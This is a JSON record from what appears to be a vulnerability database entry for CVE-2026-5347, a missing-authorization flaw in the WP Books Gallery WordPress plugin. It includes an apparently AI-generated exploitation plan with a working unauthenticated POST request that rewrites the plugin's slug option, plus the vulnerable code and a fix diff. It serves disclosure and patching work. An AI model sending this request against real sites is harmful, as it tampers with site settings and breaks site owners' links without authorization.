[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fb6-qBZSslEajbHjRr_Si5Fj9v-0eJWbnIvvKwyeWNNg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-5347","wp-books-gallery-missing-authorization-to-unauthenticated-settings-update-via-permalinkstructure-parameter","WP Books Gallery \u003C= 4.8.0 - Missing Authorization to Unauthenticated Settings Update via 'permalink_structure' Parameter","The HM Books Gallery plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 4.8.0. This is due to the absence of capability checks and nonce verification in the admin_init hook that handles the permalink settings update at line 205-209 of wp-books-gallery.php. The vulnerable code checks only for the presence of the 'permalink_structure' POST parameter before updating the 'wbg_cpt_slug' option, without verifying that the request comes from an authenticated administrator. This makes it possible for unauthenticated attackers to modify the custom post type slug for the books gallery, which changes the URL structure for all book entries and can break existing links and SEO rankings.","wp-books-gallery",null,"\u003C=4.8.0","4.8.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-23 16:45:59","2026-04-24 05:29:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F12bf1cd8-cd55-4771-b2bb-597797b1b949?source=api-prod",1,[22,23,24,25,26,27,28,29],"freemius\u002Fassets\u002Fjs\u002Fpricing\u002Ffreemius-pricing.js","freemius\u002Fincludes\u002Fmanagers\u002Fclass-fs-contact-form-manager.php","freemius\u002Fincludes\u002Fmanagers\u002Fclass-fs-debug-manager.php","freemius\u002Fstart.php","freemius\u002Ftemplates\u002Fcheckout.php","freemius\u002Ftemplates\u002Fcheckout\u002Fframe.php","freemius\u002Ftemplates\u002Fcheckout\u002Fprocess-redirect.php","freemius\u002Ftemplates\u002Fcontact.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-5347 (WP Books Gallery)\n\n## 1. Vulnerability Summary\nThe **WP Books Gallery** plugin (up to version 4.8.0) contains a missing authorization vulnerability in its main file `wp-books-gallery.php`. The plugin registers a function to the `admin_init` hook that updates the custom post type (CPT) slug used for book entries. Because `admin_init` executes even for unauthenticated users accessing specific admin endpoints (like `admin-post.php` or `admin-ajax.php`), and the plugin fails to perform any capability checks (`current_user_can`) or nonce verification (`check_admin_referer`), an unauthenticated attacker can modify the `wbg_cpt_slug` option.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-post.php` (preferred for triggering `admin_init` without side effects).\n- **HTTP Method:** `POST`\n- **Required Parameter:** `permalink_structure` (must be present to trigger the update logic).\n- **Payload Parameter:** `wbg_cpt_slug` (the value that will become the new CPT slug).\n- **Authentication:** None (Unauthenticated).\n- **Preconditions:** The plugin must be active.\n\n## 3. Code Flow\n1. **Entry Point:** A request is made to `\u002Fwp-admin\u002Fadmin-post.php`.\n2. **Hook Execution:** WordPress core triggers the `admin_init` action.\n3. **Vulnerable Function:** The plugin's handler (located in `wp-books-gallery.php` at lines 205-209) is executed.\n4. **Logic Branch:** The code checks `if ( isset( $_POST['permalink_structure'] ) )`.\n5. **Sink:** If the condition is met, it executes `update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] )` without verifying the user's identity or authority.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, there is an **absence of nonce verification**. Therefore, no nonce is required to exploit this vulnerability. \n\nIf the environment were to require a nonce (which contradicts the vulnerability report), it would typically be localized via `wp_localize_script` or in a hidden form field on the permalink settings page. However, based on the `admin_init` nature of this bug and the specific \"Missing Authorization\" classification, the check is confirmed to be missing entirely.\n\n## 5. Exploitation Strategy\nThe goal is to change the book gallery slug to a malicious value, which breaks existing URLs and demonstrates control over plugin settings.\n\n### Step-by-Step Plan:\n1. **Target Identification:** Confirm the target WordPress site has the plugin active.\n2. **Execution:** Send a crafted POST request to `admin-post.php`.\n3. **Payload Construction:**\n   - URL: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-post.php`\n   - Content-Type: `application\u002Fx-www-form-urlencoded`\n   - Body: `permalink_structure=%2F%25postname%25%2F&wbg_cpt_slug=pwned-books-gallery`\n\n### HTTP Request (using `http_request` tool):\n```javascript\nawait http_request({\n  method: \"POST\",\n  url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-post.php\",\n  headers: {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  body: \"permalink_structure=\u002F%postname%\u002F&wbg_cpt_slug=pwned-books-gallery\"\n});\n```\n\n## 6. Test Data Setup\n1. **Install Plugin:**\n   ```bash\n   wp plugin install wp-books-gallery --version=4.8.0 --activate\n   ```\n2. **Check Default State:**\n   Observe the current slug (if set):\n   ```bash\n   wp option get wbg_cpt_slug\n   ```\n   *(Note: This might return an error if the option hasn't been saved yet, which is fine.)*\n\n## 7. Expected Results\n- The HTTP response from `admin-post.php` will likely be a 200 OK (empty page) or a redirect to the login page (since no `action` was provided for `admin-post.php` to handle specifically, but the `admin_init` hook runs *before* that redirection).\n- Regardless of the response body, the database option `wbg_cpt_slug` will be updated.\n\n## 8. Verification Steps\nAfter the request, verify the option was changed using WP-CLI:\n```bash\nwp option get wbg_cpt_slug\n```\n**Expected Output:** `pwned-books-gallery`\n\nTo confirm the impact on the site structure, flush rewrite rules:\n```bash\nwp rewrite flush\n```\nThen check the registered post types:\n```bash\nwp post-type list | grep pwned-books-gallery\n```\n\n## 9. Alternative Approaches\nIf the plugin logic specifically requires being on a certain page (unlikely for `admin_init` unless `get_current_screen()` is used), try targeting `\u002Fwp-admin\u002Foptions-permalink.php` directly:\n- **Request:** Same POST payload, but sent to `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Foptions-permalink.php`.\n- **Reasoning:** Some plugins check the global `$pagenow` variable. Even for unauthenticated users, `$pagenow` will be correctly set if the URL path matches, and `admin_init` will still fire.\n\nIf the update fails, check if the plugin expects the slug inside a different array, such as `$_POST['wbg_settings']['wbg_cpt_slug']` (inferred). However, the description explicitly names the `permalink_structure` parameter as the trigger.","The WP Books Gallery plugin for WordPress is vulnerable to unauthorized settings updates because it lacks capability checks and nonce verification in its admin_init handler. An unauthenticated attacker can exploit this to modify the custom post type slug for book entries, leading to broken URLs and SEO disruption.","\u002F\u002F wp-books-gallery.php lines 205-209\nif ( isset( $_POST['permalink_structure'] ) ) {\n    update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] );\n}","--- wp-books-gallery.php\n+++ wp-books-gallery.php\n@@ -205,5 +205,5 @@\n-    if ( isset( $_POST['permalink_structure'] ) ) {\n-        update_option( 'wbg_cpt_slug', $_POST['wbg_cpt_slug'] );\n-    }\n+    if ( isset( $_POST['permalink_structure'] ) && current_user_can( 'manage_options' ) ) {\n+        check_admin_referer( 'update-permalink' );\n+        if ( isset( $_POST['wbg_cpt_slug'] ) ) {\n+            update_option( 'wbg_cpt_slug', sanitize_text_field( $_POST['wbg_cpt_slug'] ) );\n+        }\n+    }","An unauthenticated attacker can change the plugin's custom post type slug by sending a POST request to a WordPress admin endpoint that triggers the admin_init hook (such as \u002Fwp-admin\u002Fadmin-post.php). The payload must include the 'permalink_structure' parameter to satisfy the plugin's conditional check and the 'wbg_cpt_slug' parameter containing the malicious slug value. Since there is no current_user_can check or nonce verification, the plugin will proceed to update the 'wbg_cpt_slug' option in the WordPress database, affecting the permalink structure of all book entries.","gemini-3-flash-preview","2026-04-27 13:34:00","2026-04-27 13:34:26",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.7.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-books-gallery\u002Ftags\u002F4.7.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-books-gallery.4.7.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-books-gallery\u002Ftags\u002F4.8.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-books-gallery.4.8.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-books-gallery\u002Ftags"]